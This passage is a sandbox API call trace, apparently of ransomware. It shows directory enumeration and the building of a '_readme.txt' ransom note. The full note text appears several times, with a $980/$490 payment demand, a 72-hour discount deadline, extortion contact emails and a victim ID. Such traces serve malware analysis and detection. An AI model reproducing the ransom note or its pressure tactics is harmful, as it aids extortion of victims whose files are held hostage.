[0187.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.899] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0187.899] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.899] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.899] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0187.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0187.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0187.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0187.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0187.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.904] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0187.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f48 | out: hHeap=0x620000) returned 1 [0187.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ef8 | out: hHeap=0x620000) returned 1 [0187.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0187.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0187.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a98 | out: hHeap=0x620000) returned 1 [0187.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7a838 | out: hHeap=0x620000) returned 1 [0187.908] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.908] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0187.908] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0187.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.908] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.908] PathFindFileNameW (pszPath="") returned="" [0187.908] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.909] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.909] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0187.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.909] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0187.910] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0187.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.910] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0187.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0187.911] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0187.911] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0187.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0187.911] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0187.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0187.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.913] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0187.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0187.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.914] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0187.914] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.915] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0187.915] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.916] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.916] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x620000, 